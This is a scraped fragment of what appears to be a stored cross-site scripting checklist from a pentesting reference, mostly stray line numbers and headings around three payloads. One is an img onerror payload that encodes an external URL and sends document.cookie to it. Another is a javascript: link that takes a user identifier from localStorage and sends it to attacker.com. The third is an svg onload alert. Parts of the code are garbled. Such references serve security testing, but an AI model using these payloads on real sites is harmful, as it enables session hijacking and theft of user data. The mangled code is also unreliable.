Stored Cross Site Scripting
Check List
Methodology
Black Box
1
2
3
4
"><img src=1 onerror="url=String104,116,116,112,115,58,47,47,103,97,116,111,108,111,117,99,111,46,48,48,48,119,101,98,104,111,115,116,97,112,112,46,99,111,109,47,99,115,109,111,110,101,121,47,105,110,100,101,120,46,112,104,112,63,116,111,107,101,110,115,61+encodeURIComponent(document['cookie']);xhttp= new XMLHttpRequest();xhttp'GET',url,true;xhttp'send';5
6
1
2
3
4
5
6
7
1
2
3
4
5
{
"ipAddress": "<svg on onload=(alert)(document.domain)>",
"callBackURL":"dssdsd"
}6
1
2
3
4
5
6
7
<a href="javascript:var match=JSON.stringify(localStorage).match(/ZNavIdentity\.userId=[^&]+&currEntityId=[^&]+/);if(match)fetch('https://attacker.com/?data='+encodeURIComponent(match[0]))">Click to "Verify"</a> 8
9
10
White Box
Cheat Sheet
Last updated